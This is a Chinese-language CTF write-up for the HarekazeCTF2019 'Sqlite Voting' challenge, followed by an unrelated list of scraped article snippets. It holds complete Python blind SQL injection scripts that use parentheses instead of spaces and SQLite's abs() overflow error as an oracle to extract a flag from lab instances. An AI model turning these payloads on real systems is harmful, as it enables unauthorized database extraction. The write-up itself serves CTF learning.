暮w光
暮w光

[HarekazeCTF2019]Sqlite Voting

1.打开题目可以看到连链接到两个地址,投票是简单的post传输id,fuzz一下不出所料过滤挺严:
source.php源码:
[HarekazeCTF2019]Sqlite Voting_第1张图片
sql文件:
[HarekazeCTF2019]Sqlite Voting_第2张图片
2.审计下发现只能在update处注入,而且update成功与否返回结果不同,因此此处用盲注,但是已经把单双引号过滤了,没办法闭合,那怎么办?参考writeup貌似是利用报错来进行盲注,利用了sqllite的一个abs()函数溢出漏洞:

[HarekazeCTF2019]Sqlite Voting_第3张图片

payload:abs(case(length(hex((select(flag)from(flag))))&{1<<n})when(0)then(0)else(0x8000000000000000)end)

hex()的位运算来判断flag表里的长度,{1<

[HarekazeCTF2019]Sqlite Voting_第4张图片

判断flag长度payload:

import requests

url = "http://5cf611f2-ecff-478f-8efd-e527adfcab0c.node4.buuoj.cn:81/vote.php"
l = 0
for n in range(16):
    payload = 'abs(case(length(hex((select(flag)from(flag))))&{})when(0)then(0)else(0x8000000000000000)end)'.format(1<<n)
    data = {
        'id' : payload
    }

    r = requests.post(url=url, data=data)
    print(data)
    print(r.text)
    if 'occurred' in r.text:
        l = l|1<<n

print(l)

3.之后其实就是构造出A~F,有了16进制表示flag,利用报错爆破出flag,实在看不懂,学废了:

[HarekazeCTF2019]Sqlite Voting_第5张图片
简单解释:

abs(
    case(	#因为没有替换,when(trim(0,0))不匹配,则执行后面else语句abs(0x8000000000000000)从而报错
        replace(  #replace(得到的长度,84,''),若匹配到长度不为84则不替换,返回flase
            length(  #此时长度改变,不再为84
                replace( #若{t}包含在flag,则被替换为空。
                    hex(
                        (select(flag)from(flag))
                    ),{t},trim(0,0)
                )
            ),{l},trim(0,0)
        )
    )when(trim(0,0))then(0)else(0x8000000000000000)end
)

因为空格被过滤了,所以我们用括号给括起来绕过空格。case()when()then()else()进行判断。如果前面判断为真则出现系统的错误,如果为假则触发else,出现abs溢出的报错。

大佬的payload:

# coding: utf-8
import binascii
import requests

URL = 'http://5cf611f2-ecff-478f-8efd-e527adfcab0c.node4.buuoj.cn:81/vote.php'

# フラグの長さを特定
l = 0
i = 0
for j in range(16):
    r = requests.post(URL, data={
        'id': f'abs(case(length(hex((select(flag)from(flag))))&{1 << j})when(0)then(0)else(0x8000000000000000)end)'
    })
    if b'An error occurred' in r.content:
        l |= 1 << j
print('[+] length:', l)

# A-F のテーブルを作成
table = {'A': 'trim(hex((select(name)from(vote)where(case(id)when(3)then(1)end))),12567)',
         'C': 'trim(hex(typeof(.1)),12567)', 'D': 'trim(hex(0xffffffffffffffff),123)', 'E': 'trim(hex(0.1),1230)',
         'F': 'trim(hex((select(name)from(vote)where(case(id)when(1)then(1)end))),467)'}
table['B'] = f'trim(hex((select(name)from(vote)where(case(id)when(4)then(1)end))),16||{table["C"]}||{table["F"]})'

# フラグをゲット!
res = binascii.hexlify(b'flag{').decode().upper()
for i in range(len(res), l):
    for x in '0123456789ABCDEF':
        t = '||'.join(c if c in '0123456789' else table[c] for c in res + x)
        r = requests.post(URL, data={
            'id': f'abs(case(replace(length(replace(hex((select(flag)from(flag))),{t},trim(0,0))),{l},trim(0,0)))when(trim(0,0))then(0)else(0x8000000000000000)end)'
        })
        if b'An error occurred' in r.content:
            res += x
            break
    print(f'[+] flag ({i}/{l}): {res}')
    i += 1
print('[+] flag:', binascii.unhexlify(res).decode())

出题人payload:

# coding: utf-8
import binascii
import requests
URL = 'http://1aa0d946-f0a0-4c60-a26a-b5ba799227b6.node2.buuoj.cn.wetolink.com:82/vote.php'


l = 0
i = 0
for j in range(16):
  r = requests.post(URL, data={
    'id': f'abs(case(length(hex((select(flag)from(flag))))&{1<<j})when(0)then(0)else(0x8000000000000000)end)'
  })
  if b'An error occurred' in r.content:
    l |= 1 << j
print('[+] length:', l)


table = {}
table['A'] = 'trim(hex((select(name)from(vote)where(case(id)when(3)then(1)end))),12567)'
table['C'] = 'trim(hex(typeof(.1)),12567)'
table['D'] = 'trim(hex(0xffffffffffffffff),123)'
table['E'] = 'trim(hex(0.1),1230)'
table['F'] = 'trim(hex((select(name)from(vote)where(case(id)when(1)then(1)end))),467)'
table['B'] = f'trim(hex((select(name)from(vote)where(case(id)when(4)then(1)end))),16||{table["C"]}||{table["F"]})'


res = binascii.hexlify(b'flag{').decode().upper()
for i in range(len(res), l):
  for x in '0123456789ABCDEF':
    t = '||'.join(c if c in '0123456789' else table[c] for c in res + x)
    r = requests.post(URL, data={
      'id': f'abs(case(replace(length(replace(hex((select(flag)from(flag))),{t},trim(0,0))),{l},trim(0,0)))when(trim(0,0))then(0)else(0x8000000000000000)end)'
    })
    if b'An error occurred' in r.content:
      res += x
      break
  print(f'[+] flag ({i}/{l}): {res}')
  i += 1
print('[+] flag:', binascii.unhexlify(res).decode())

这题真的好难,涉及的知识好多好多,即使看了writeup仍感觉一知半解的。貌似是到外国题,真的膜拜出题人。

参考:wp1、wp2、wp3(看的最懵但也最强)这些精心构造payload的过程真的太让人佩服了!

你可能感兴趣的:(CTF,sqlite,安全,web安全)

  • 网络编程 9.10 Tangver 数据库
    完成代码剩余功能typedefstruct{intgh;charname[20];doublesalary;}Worker;intdo_insert(sqlite3*ppDb){Workerwork;printf("请输入插入的工号:");scanf("%d",&work.gh);printf("请输入插入的姓名:");scanf("%s",work.name);printf("请输入插入的薪水:
  • Oracle数据库中的Oracle Label Security是什么 2401_85812026 javascript开发语言ecmascript
    OracleLabelSecurity(OLS)是Oracle数据库中的一个强大特性,它提供了基于标签的行级安全性控制。通过OLS,组织可以实施细粒度的数据访问控制,确保用户只能访问他们被授权的数据。OracleLabelSecurity的工作原理OLS通过定义一系列的标签和安全策略来控制对数据库中数据的访问。每个数据行都会被分配一个或多个标签,而用户或应用程序的会话也会被分配一个标签。当用户尝试
  • 2019-12-20 雨遥高效阅读
    昨天约了供应商来谈价钱,今天早上,对方如约而至。对方一看就是有备而来,而我却底气不足,因为价钱谈判这块,我就是空白的,我只能强装淡定,来掩盖我的不自信。果然,对方侃侃而谈,一会是市场,一会是技术,一会又是项目背景的,我真的毫无还手之力,全是对方在掌控节奏。价钱当然也没有谈下来,对方只是相应的优惠了一点金额,并没有降点。自己对于技术,安全设备的市场一点知识储存量都没有,而对方是已经混了十几年的老江湖
  • 2022-12-17 你好南方
    今天一睁眼就看看暖暖的阳光从窗户偷偷进了房间,又一个美好的一天开始。早早起床去下了炝锅面,前几天早上都是煮粥,今天换一下。吃了面,洗漱完毕整理好一切准备上课,这几天上课的孩子明显减少,看今天怎样吧,这样下去真不是事儿。我今天的客户上周就联系好了今天过来试课报名,期待了这么久,不会又泡汤吧。不过也不奇怪,马上要过年了,春节后再报名也不迟,也在不乎这几天,反过来我是家长,单单从安全角度来说我也会选择在
  • 《有感就发》之31:下山更比上山难 回家烧茶
    图片发自App上山不易,下山更难!人生亦如此。成功冲顶珠峰的人廖廖,大多数人当时并非不具一鼓作气登顶能力,而是已无登顶后安全回撤的体力储备,不得已而为之。然在仕途上人们普遍苦苦追求向上攀爬,少有适可而止,以至有些人登得了顶,却下不了山,周令郭徐之流是为典型,可悲、可叹、可怜!吾辈可鉴。
  • 2020/12/17感恩日记 德胜
    感恩感谢自己的皮肤越来越好越来越年轻态,感恩感谢敏姐同学于教授的产品和私人订制的产品,给我们带来安全美丽的产品。感恩感谢好种子开花结果带给我的回向和收获,感恩感谢坏种子爆破带给我的教训和改变,感恩感谢咖啡冥想的力量给我强大的力量和美好善愿一一实现,感恩感谢家人们都平安健康。感恩感谢先生的事业顺利,财源茂盛。感恩感谢需要帮忙的人都能得到帮助。感恩感谢孙总和侯总的支持和帮助。
  • 重塑未来:碳捕集与存储(CCS)的革命性突破与可持续发展路径 给生活加糖! 热门知识大数据人工智能
    随着全球气候变化的加剧,减少二氧化碳(CO₂)排放已成为应对气候变化的关键任务之一。碳捕集与存储(CCS)技术因其能够直接从源头捕捉CO₂并将其安全存储,避免其进入大气层,而受到广泛关注。CCS被认为是实现气候目标,尤其是在高排放行业中实现碳中和的一个重要手段。本文将详细探讨CCS的工作原理、技术类型、应用领域、面临的挑战以及未来的发展方向。一、碳捕集与存储的概念与重要性1.碳捕集与存储的定义碳捕
  • #LLM入门|Prompt#2.3_对查询任务进行分类|意图分析_Classification 向日葵花籽儿 LLM入门教程笔记prompt分类数据库
    在本章中,我们将重点探讨评估输入任务的重要性,这关乎到整个系统的质量和安全性。在处理不同情况下的多个独立指令集的任务时,首先对查询类型进行分类,并以此为基础确定要使用哪些指令,具有诸多优势。这可以通过定义固定类别和硬编码与处理特定类别任务相关的指令来实现。例如,在构建客户服务助手时,对查询类型进行分类并根据分类确定要使用的指令可能非常关键。具体来说,如果用户要求关闭其账户,那么二级指令可能是添加有
  • 打卡D6#/21 水色斑斓S
    图片发自AppD6#案主信息:女性,31岁,药店上班画的名字:向往画面要怎么描述,就一个简单的房子,一颗树,还有草地,石阶,还有一个我。分析:画者将人物放在最右边且房子没有窗户、门小,显示其内心安全感不足,性格偏保守、内向、被动、柔弱、随性,依赖性性强,不太擅长跟陌生人打交道,自我保护意识强,希望别人主动走进内心,想象力丰富,喜欢幻想,内心能量不够强大,拥有爱心,自控力强,不愿意承担责任。
  • Java面试必问之Hashmap底层实现原理(JDK1.7) 当我遇上你csy Java基础javahashmap面试源码
    1.前言Hashmap可以说是Java面试必问的,一般的面试题会问:Hashmap有哪些特性?Hashmap底层实现原理(get\put\resize)Hashmap怎么解决hash冲突?Hashmap是线程安全的吗?…今天就从源码角度一探究竟。笔者的源码是OpenJDK1.72.构造方法首先看构造方法的源码//默认初始容量staticfinalintDEFAULT_INITIAL_CAPACIT
  • AI算法部署方式对比分析:哪种方案性价比最高? TSINGSEE AI智能人工智能视频监控技术安防视频监控
    随着人工智能技术的飞速发展,AI算法在各个领域的应用日益广泛。AI算法的部署方式直接关系到系统的性能、实时性、成本及安全性等多个方面。本文将探讨AI算法分析的三种主要部署方式:本地计算、边缘计算和云计算,并详细分析它们的优劣性。一、本地计算1)部署方式本地计算是指将AI算法直接部署在摄像头或其他终端设备上。这种部署方式使得数据处理和分析在设备本地完成,无需通过网络传输数据。2)优点高效实时:由于数
  • 爱孩子是父母的天性,有意识地爱孩子是培养孩子安全感和勇气的最重要的方法。 纯洁的无瑕疵
    爱孩子是父母的天性,有意识地爱孩子是培养孩子安全感和勇气的最重要的方法。当孩子被无条件地爱着的时候,他的自信心会大增,在他的心灵中会感受到自我价值的产生。很多家长对孩子的爱是有条件的,要求孩子做出相应的行为或取得相应的成绩,然后再给予孩子与之相适应的爱,家长与孩子的关系成了“生意”关系。这种有条件的爱,极大地扼杀了孩子的自尊心。孩子会觉得自己不够好,自己还需要做出相应的动作,父母才能爱自己。孩子在
  • 直返app安全吗?直返app靠谱吗?直返APP背景揭秘 氧惠好项目
    亲爱的朋友们,你们是不是经常在网上寻找哪里可以下载直返APP?或者对于直返APP的可靠性感到疑虑?让我来给你们揭开这个谜团!氧惠APP(带货领导者)——是与以往完全不同的抖客+淘客app!2023全新模式,我的直推也会放到你下面。主打:带货高补贴,深受各位带货团队长喜爱(每天出单带货几十万单)。注册即可享受高补贴+0撸+捡漏等带货新体验。送万元推广大礼包,教你如何1年做到百万团队。首先,关于直返A
  • 详细分析数据库的三级模式 码农研究僧 数据库数据库三级模式外模式内模式概念模式
    目录前言1.基本知识2.总结前言对于软考来说也是常考内容此处着重补充下基本知识1.基本知识包括外模式、概念模式和内模式,旨在将数据的物理存储、逻辑结构和用户视图进行分离这种体系结构的主要目的是实现数据库的独立性、数据安全性和数据共享一、外模式:外模式也称为用户模式或视图模式,定义数据库对用户或应用程序的具体视图主要用于定义用户如何看到和操作数据库中的数据不同用户可以有不同的外模式,用户不必关心数据
  • 论心理战 二 恐惧 阳光下的沈同学
    你是否在大盘指数下跌的时候会恐惧?你是否在股票下跌的时候会恐惧?很多人只会在下跌的时候拼命卖出,在上涨的时候追高买入。其实下跌才是高手开始操作的时候,不下跌怎么会有低估的机会出现?不低估怎么安全的赚钱?但如果你不知道会跌到哪里,就会恐惧,就会不敢买入,只会在下跌的时候吓的卖出。下跌对投资者的信心打击很大,没有人会担心一支上涨的股票,但大部分人都担心一支下跌的股票。这是大部分人亏钱的核心原因,上涨才
  • 从目标出发 微乴问
    从目标出发一直已来都以踏实肯干自居,于是做预估提要求的时候,都明显的表现出保守的个性。怕被下属说手伸得太长,不好意思跟vip有深入的交流。怕大家感觉不舒服,不好意思在会议中提出建设性的意见……是的,我在以现状为中心探索周围。之前的逻辑自洽来源于能力圈的不断向外拓展,我只在自己管辖范围内活动,一旦碰到挑战和风险,就马上退回舒适区,多好多安全。在最近的工作中,却由于这一点遇到很多挑战。新领导是一个目标
  • 笔记22 追求安全感 玩命凯旋
    我的一个同学刚考了今年的国家公务员,笔试成绩出来了,他进入面试名额了,现在一直在做面试相关的准备。看到他的这种状态,再想想公务员的福利待遇也很好,我内心也产生了考公务员的强烈想法,这或许是在外漂泊久了想回家过安定生活,也或许是好多同学都考上了很羡慕他们!重庆每年有两次考试机会,再加上国考,一年共三次!今天看了好多关于安全感的评论,很多同学身在体制中,表示工作相当乏味没有激情,除了安全没有其他任何好
  • 绿色智慧档案馆构想之智慧档案馆环境综合管控一体化平台 盛世宏博智慧档案 智慧档案馆智慧档案馆
    【智慧档案馆整体效果图】智慧档案库房一体化平台通过智慧档案管理,实现智慧档案感知协同处置功能;实现对档案实体的智能化识别、定位、跟踪监控;实现对档案至智能密集架、空气恒湿净化一体设备、安防设备,门禁设备等智能化巡检与即时处理。智慧档案平台基于物联网、云计算、大数据、档案人健康防护、档案安全防护等新技术,实现了对档案的收、管、存、用全业务流程管理;实现了对档案实体资源与数字资源的集中建设与管理;实现
  • 比追求安全感更重要的是面对不确定的能力 小雨点1023
    你有没有过这样的向往?向往在生活中拥有一项技能可以“以不变应万变”,可以面对各种变数都能游刃有余?面对这两年的疫情,各行各业的不景气,身陷其中的我们可能有很多都在尝试新的东西,都希望自己的能力能够配得上这个世界转瞬即逝的变化。那么,我们该如何让自己拥有这样的超能力呢?其实,人的一生本质就是两件事,知和行。而连接这两者的就是我们的学习能力。生平我们知道的道理很多,落实到实际行动中的却很少,为什么呢?
  • 西部五省游,喜登嘉峪关 卢树枝
    作者:郑汉兵20OO年五月,我和老伴商量,想外出旅游,看看祖国的大好河山。但是两个孙子上学要照顾,早送晚接,离不开我们怎么办。老伴非常理解我的心情,那我们就轮流外出吧。今年你出去,明年我出去。现在我们腿脚还好,身体又没有什么大的问题,应当走出去,放松心情。于是我们就找到了中南旅游公司,老伴问我想去那里去,我说祖国的南北方巳经去过多次。异国它鄉的味道我以感受过。我是一人外出,从安全方面考虑,选乘旅游
  • 惊险瞬间 落雪1117
    一早,送孩儿上学。经过镇里的小路,一拐弯,便是高速路入口,孩儿爹驾车,我坐在副驾。前面一辆车顺利通过了ETC入口,我们的车速不快,保持在安全范围内。前面车通过后,栏杆没有放下,直挺挺地立着,我向左侧的收费显示屏瞄了一眼,发现显示的信息是前一辆车的车牌号,急忙提醒孩儿爹“信息好像没刷上!”孩儿爹有些不相信,扭头看去,脚下虽然没有给油,却也没踩刹车,我将头扭回,瞬间发现,那挺立着的栏杆落了下来,“啊!
  • Vue项目中实现AES加密解密 小金子J 前端框架JavaScript分享vue.js前端javascript
    在前端开发中,保护用户数据的安全性至关重要。AES(高级加密标准)作为一种广泛使用的对称加密算法,因其高效性和安全性而受到青睐。本文将介绍如何在Vue项目中实现AES加密解密,包括ECB和CBC两种模式。环境搭建在Vue项目中使用AES加密解密功能之前,需要先安装crypto-js库。通过执行以下命令,可以轻松地将crypto-js添加到项目中:npminstallcrypto-js--save-
  • Rust 函数 lly202406 开发语言
    Rust函数Rust是一种系统编程语言,以其安全性、速度和并发性而闻名。在Rust中,函数是一等公民,是组织代码和实现功能的基本单位。本文将深入探讨Rust中的函数,包括其定义、特性、参数、返回值以及高级用法。函数定义在Rust中,函数使用fn关键字定义。函数可以有参数和返回值。下面是一个简单的函数定义示例:fngreet(name:&str)->String{format!("Hello,{}!
  • get请求与post请求的不同 苍墨穹天 pythonpython
    1、GET表示从指定的服务器中获取数据,POST表示提交数据给指定的服务器处理2、GET查询的字符串参数显示在地址栏的URL中,请求参数是可见的。POST查询字符串不会显示在地址栏中,请求参数是不可见的3、GET请求能够被缓存,P0ST请求不能被缓存下来4、GDT请求有长度限制,POST请求没有长度限制5、GET查询的字符串参数会显示在地址栏的URL中,不安全,不要使用GET请求提交敏感数据P0S
  • ctf逆向解题——Bomb二进制炸弹 Funkypantss
    BombPhase1在输入阶段将由文件输入的字符存储在input中,在phase1,该阶段将原字符串存储到rdi中,调用pases_1函数进行字符串比较。image进入phase1函数,该函数将原字符串rdi与预先设定的字符串“BorderrelationswithCanadahaveneverbeenbetter.”(存储在rsi中)进行比较,用于比较的函数是strings_not_equal,
  • 2022年全面推进乡村振兴,释放三大重点,农民又迎来了哪些机会? 李云飞
    作者:李云飞|来源:原创一位久经商场的创业老司机,关注我,每天分享一点财富干货,让你的人生少走弯路。最近中央1号文件出来了,是关于《做好2022年全面推进乡村振兴重点工作意见》的文件,里面涉及很多内容。今天我梳理出三个重点来给农民朋友解读下,以及接下来我们农民朋友又要怎么干?第一、确保国家粮食安全问题。在去年农村会议上,中央就提出了要确保粮食安全的问题,这次总算把这件事情给落地了。我们首先从内部环
  • 高情商沟通(9)迅速破冰建立信任,持续获得好感 叁叁二二叁磊设计
    高情商,两人相遇无话可说,实质是彼此没有安全感,而让对方有安全感的基本是信任感,破冰就是要让对方产生信任感,建立信任的目的:在沟通中,建立彼此之间的信任感,其最重要的目的,是建立起良好的人脉关系,建立信任的需求:没有安全感,就不会链接到其他伙伴,也不会有彼此之间的资源互换,建立信任的核心:破冰沟通不成功的核心原因是彼此没有找到共同认可的观点和话题建立信任的结果:信任产生人脉,人脉产生资源沟通破冰模
  • 【双语新闻】AGI安全与对齐,DeepMind近期工作 曲奇人工智能安全 agi安全llama人工智能
    我们想与AF社区分享我们最近的工作总结。以下是关于我们正在做什么,为什么会这么做以及我们认为它的意义所在的一些详细信息。我们希望这能帮助人们从我们的工作基础上继续发展,并了解他们的工作如何与我们相关联。byRohinShah,SebFarquhar,AncaDragan21stAug2024AIAlignmentForumWewantedtosharearecapofourrecentoutput
  • 【免费刷题】实验室安全第一知识题库分享 打工要不要摸鱼 安全
    道路千万条,实验安全第一条。嘿,实验室的小伙伴们!是不是还在为实验室安全考试而烦恼?别担心,今天就让我来分享一些实用的题库,帮助你轻松应对考试,同时也更好地保护自己和实验室的安全。一、为什么要注意实验室安全?实验室是进行实验教学和科学研究的重要基地,实验室安全不仅关系到我们自身的生命健康,还关系到实验室财产的安全。一个小小的疏忽,就可能导致大大的事故。所以,我们要时刻牢记“安全第一,预防为主”。举
  • FPGA编程指南: CSU DMA传输 行者.................. fpga开发FPGA
    1.将安全流开关配置设置为从DMA源接收,即设置csu.csu_sss_cfg[pcap_sss]为0x5。2.配置并设置CSU_DMA以建立通道和传输,具体编程方法可参考CSUDMA编程部分。-通道类型为DMA_SRC。-设置源地址为位流的地址。-设置大小为以字表示的位流大小。3.等待CSUDMA操作完成,确保源频道的传输已完成。4.清除CSU_DMA中断并确认传输完成,这需要设置csudma.
  • mondb入手 木zi_鸣 mongodb
    windows 启动mongodb  编写bat文件, mongod --dbpath D:\software\MongoDBDATA mongod --help  查询各种配置 配置在mongob 打开批处理,即可启动,27017原生端口,shell操作监控端口  扩展28017,web端操作端口 启动配置文件配置, 数据更灵活 
  • 大型高并发高负载网站的系统架构 bijian1013 高并发负载均衡
            扩展Web应用程序 一.概念         简单的来说,如果一个系统可扩展,那么你可以通过扩展来提供系统的性能。这代表着系统能够容纳更高的负载、更大的数据集,并且系统是可维护的。扩展和语言、某项具体的技术都是无关的。扩展可以分为两种:         1.
  • DISPLAY变量和xhost(原创) czmmiao display
    DISPLAY 在Linux/Unix类操作系统上, DISPLAY用来设置将图形显示到何处. 直接登陆图形界面或者登陆命令行界面后使用startx启动图形, DISPLAY环境变量将自动设置为:0:0, 此时可以打开终端, 输出图形程序的名称(比如xclock)来启动程序, 图形将显示在本地窗口上, 在终端上输入printenv查看当前环境变量, 输出结果中有如下内容:DISPLAY=:0.0
  • 获取B/S客户端IP 周凡杨 java编程jspWeb浏览器
       最近想写个B/S架构的聊天系统,因为以前做过C/S架构的QQ聊天系统,所以对于Socket通信编程只是一个巩固。对于C/S架构的聊天系统,由于存在客户端Java应用,所以直接在代码中获取客户端的IP,应用的方法为:    String ip = InetAddress.getLocalHost().getHostAddress(); 然而对于WEB
  • 浅谈类和对象 朱辉辉33 编程
        类是对一类事物的总称,对象是描述一个物体的特征,类是对象的抽象。简单来说,类是抽象的,不占用内存,对象是具体的, 占用存储空间。     类是由属性和方法构成的,基本格式是public  class 类名{ //定义属性 private/public 数据类型 属性名; //定义方法 publ
  • android activity与viewpager+fragment的生命周期问题 肆无忌惮_ viewpager
    有一个Activity里面是ViewPager,ViewPager里面放了两个Fragment。 第一次进入这个Activity。开启了服务,并在onResume方法中绑定服务后,对Service进行了一定的初始化,其中调用了Fragment中的一个属性。 super.onResume(); bindService(intent, conn, BIND_AUTO_CREATE);
  • base64Encode对图片进行编码 843977358 base64图片encoder
    /** * 对图片进行base64encoder编码 * * @author mrZhang * @param path * @return */ public static String encodeImage(String path) { BASE64Encoder encoder = null; byte[] b = null; I
  • Request Header简介 aigo servlet
    当一个客户端(通常是浏览器)向Web服务器发送一个请求是,它要发送一个请求的命令行,一般是GET或POST命令,当发送POST命令时,它还必须向服务器发送一个叫“Content-Length”的请求头(Request   Header)   用以指明请求数据的长度,除了Content-Length之外,它还可以向服务器发送其它一些Headers,如:    
  • HttpClient4.3 创建SSL协议的HttpClient对象 alleni123 httpclient爬虫ssl
    public class HttpClientUtils { public static CloseableHttpClient createSSLClientDefault(CookieStore cookies){ SSLContext sslContext=null; try { sslContext=new SSLContextBuilder().l
  • java取反 -右移-左移-无符号右移的探讨 百合不是茶 位运算符 位移
    取反: 在二进制中第一位,1表示符数,0表示正数 byte a = -1; 原码:10000001 反码:11111110 补码:11111111 //异或: 00000000 byte b = -2; 原码:10000010 反码:11111101 补码:11111110 //异或: 00000001
  • java多线程join的作用与用法 bijian1013 java多线程
            对于JAVA的join,JDK 是这样说的:join public final void join (long millis )throws InterruptedException Waits at most millis milliseconds for this thread to die. A timeout of 0 means t
  • Java发送http请求(get 与post方法请求) bijian1013 javaspring
    PostRequest.java package com.bijian.study; import java.io.BufferedReader; import java.io.DataOutputStream; import java.io.IOException; import java.io.InputStreamReader; import java.net.HttpURL
  • 【Struts2二】struts.xml中package下的action配置项默认值 bit1129 struts.xml
    在第一部份,定义了struts.xml文件,如下所示:   <!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN" "http://struts.apache.org/dtds/struts
  • 【Kafka十三】Kafka Simple Consumer bit1129 simple
    代码中关于Host和Port是割裂开的,这会导致单机环境下的伪分布式Kafka集群环境下,这个例子没法运行。 实际情况是需要将host和port绑定到一起,   package kafka.examples.lowlevel; import kafka.api.FetchRequest; import kafka.api.FetchRequestBuilder; impo
  • nodejs学习api ronin47 nodejs api
    NodeJS基础 什么是NodeJS JS是脚本语言,脚本语言都需要一个解析器才能运行。对于写在HTML页面里的JS,浏览器充当了解析器的角色。而对于需要独立运行的JS,NodeJS就是一个解析器。 每一种解析器都是一个运行环境,不但允许JS定义各种数据结构,进行各种计算,还允许JS使用运行环境提供的内置对象和方法做一些事情。例如运行在浏览器中的JS的用途是操作DOM,浏览器就提供了docum
  • java-64.寻找第N个丑数 bylijinnan java
    public class UglyNumber { /** * 64.查找第N个丑数 具体思路可参考 [url] http://zhedahht.blog.163.com/blog/static/2541117420094245366965/[/url] * 题目:我们把只包含因子 2、3和5的数称作丑数(Ugly Number)。例如6、8都是丑数,但14
  • 二维数组(矩阵)对角线输出 bylijinnan 二维数组
    /** 二维数组 对角线输出 两个方向 例如对于数组: { 1, 2, 3, 4 }, { 5, 6, 7, 8 }, { 9, 10, 11, 12 }, { 13, 14, 15, 16 }, slash方向输出: 1 5 2 9 6 3 13 10 7 4 14 11 8 15 12 16 backslash输出: 4 3
  • [JWFD开源工作流设计]工作流跳跃模式开发关键点(今日更新) comsci 工作流
       既然是做开源软件的,我们的宗旨就是给大家分享设计和代码,那么现在我就用很简单扼要的语言来透露这个跳跃模式的设计原理    大家如果用过JWFD的ARC-自动运行控制器,或者看过代码,应该知道在ARC算法模块中有一个函数叫做SAN(),这个函数就是ARC的核心控制器,要实现跳跃模式,在SAN函数中一定要对LN链表数据结构进行操作,首先写一段代码,把
  • redis常见使用 cuityang redis常见使用
    redis 通常被认为是一个数据结构服务器,主要是因为其有着丰富的数据结构 strings、map、 list、sets、 sorted sets 引入jar包 jedis-2.1.0.jar  (本文下方提供下载) package redistest; import redis.clients.jedis.Jedis; public class Listtest
  • 配置多个redis dalan_123 redis
    配置多个redis客户端 <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"       xmlns:xsi=&quo
  • attrib命令 dcj3sjt126com attr
      attrib指令用于修改文件的属性.文件的常见属性有:只读.存档.隐藏和系统.    只读属性是指文件只可以做读的操作.不能对文件进行写的操作.就是文件的写保护.    存档属性是用来标记文件改动的.即在上一次备份后文件有所改动.一些备份软件在备份的时候会只去备份带有存档属性的文件. 
  • Yii使用公共函数 dcj3sjt126com yii
    在网站项目中,没必要把公用的函数写成一个工具类,有时候面向过程其实更方便。 在入口文件index.php里添加 require_once('protected/function.php'); 即可对其引用,成为公用的函数集合。 function.php如下:   <?php /**   * This is the shortcut to D
  • linux 系统资源的查看(free、uname、uptime、netstat) eksliang netstatlinux unamelinux uptimelinux free
    linux 系统资源的查看 转载请出自出处:http://eksliang.iteye.com/blog/2167081   http://eksliang.iteye.com 一、free查看内存的使用情况 语法如下:   free [-b][-k][-m][-g] [-t] 参数含义 -b:直接输入free时,显示的单位是kb我们可以使用b(bytes),m
  • JAVA的位操作符 greemranqq 位运算JAVA位移<<>>>
    最近几种进制,加上各种位操作符,发现都比较模糊,不能完全掌握,这里就再熟悉熟悉。   1.按位操作符 :    按位操作符是用来操作基本数据类型中的单个bit,即二进制位,会对两个参数执行布尔代数运算,获得结果。    与(&)运算:    1&1 = 1, 1&0 = 0, 0&0 &
  • Web前段学习网站 ihuning Web
      Web前段学习网站 菜鸟学习:http://www.w3cschool.cc/   JQuery中文网:http://www.jquerycn.cn/   内存溢出:http://outofmemory.cn/#csdn.blog   http://www.icoolxue.com/   http://www.jikexue
  • 强强联合:FluxBB 作者加盟 Flarum justjavac r
    原文:FluxBB Joins Forces With Flarum作者:Toby Zerner译文:强强联合:FluxBB 作者加盟 Flarum译者:justjavac FluxBB 是一个快速、轻量级论坛软件,它的开发者是一名德国的 PHP 天才 Franz Liedke。FluxBB 的下一个版本(2.0)将被完全重写,并已经开发了一段时间。FluxBB 看起来非常有前途的,
  • java统计在线人数(session存储信息的) macroli javaWeb
    这篇日志是我写的第三次了 前两次都发布失败!郁闷极了!   由于在web开发中常常用到这一部分所以在此记录一下,呵呵,就到备忘录了! 我对于登录信息时使用session存储的,所以我这里是通过实现HttpSessionAttributeListener这个接口完成的。 1、实现接口类,在web.xml文件中配置监听类,从而可以使该类完成其工作。 public class Ses
  • bootstrp carousel初体验 快速构建图片播放 qiaolevip 每天进步一点点学习永无止境bootstrap纵观千象
    img{ border: 1px solid white; box-shadow: 2px 2px 12px #333; _width: expression(this.width > 600 ? "600px" : this.width + "px"); _height: expression(this.width &
  • SparkSQL读取HBase数据,通过自定义外部数据源 superlxw1234 sparksparksqlsparksql读取hbasesparksql外部数据源
    关键字:SparkSQL读取HBase、SparkSQL自定义外部数据源     前面文章介绍了SparSQL通过Hive操作HBase表。   SparkSQL从1.2开始支持自定义外部数据源(External DataSource),这样就可以通过API接口来实现自己的外部数据源。这里基于Spark1.4.0,简单介绍SparkSQL自定义外部数据源,访
  • Spring Boot 1.3.0.M1发布 wiselyman spring boot
        Spring Boot 1.3.0.M1于6.12日发布,现在可以从Spring milestone repository下载。这个版本是基于Spring Framework 4.2.0.RC1,并在Spring Boot 1.2之上提供了大量的新特性improvements and new features。主要包含以下:   1.提供一个新的sprin
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他